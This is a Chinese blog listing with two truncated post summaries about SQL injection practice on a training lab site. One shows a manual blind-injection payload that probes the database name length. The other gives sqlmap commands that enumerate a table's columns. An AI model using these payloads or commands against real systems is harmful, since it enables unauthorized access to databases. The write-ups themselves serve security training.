摘要: 徒手盲注 http://injectx1.lab.aqlab.cn:81/Pass-10/index.php?id=1 and length(database())>11 当为>12,显示错误 所以数据库字符为12 然后对数据库名字进行猜测 第一个字符为 http://injectx1.lab.aq 阅读全文
posted @ 2021-07-05 22:56 testadm1n 阅读(146) 评论(0) 推荐(0) 编辑
摘要: 所用方法 sqlmap跑,get请求 通过之前的经验,知道了数据库是error,表是error_flag sqlmap.py -u "xxx.xxx.xx?id=" --colums -T 表名 -D 当前数据库名 查看列名及类型 sqlmap.py -u http://injectx1.lab.a 阅读全文
posted @ 2021-07-05 17:36 testadm1n 阅读(57) 评论(0) 推荐(0) 编辑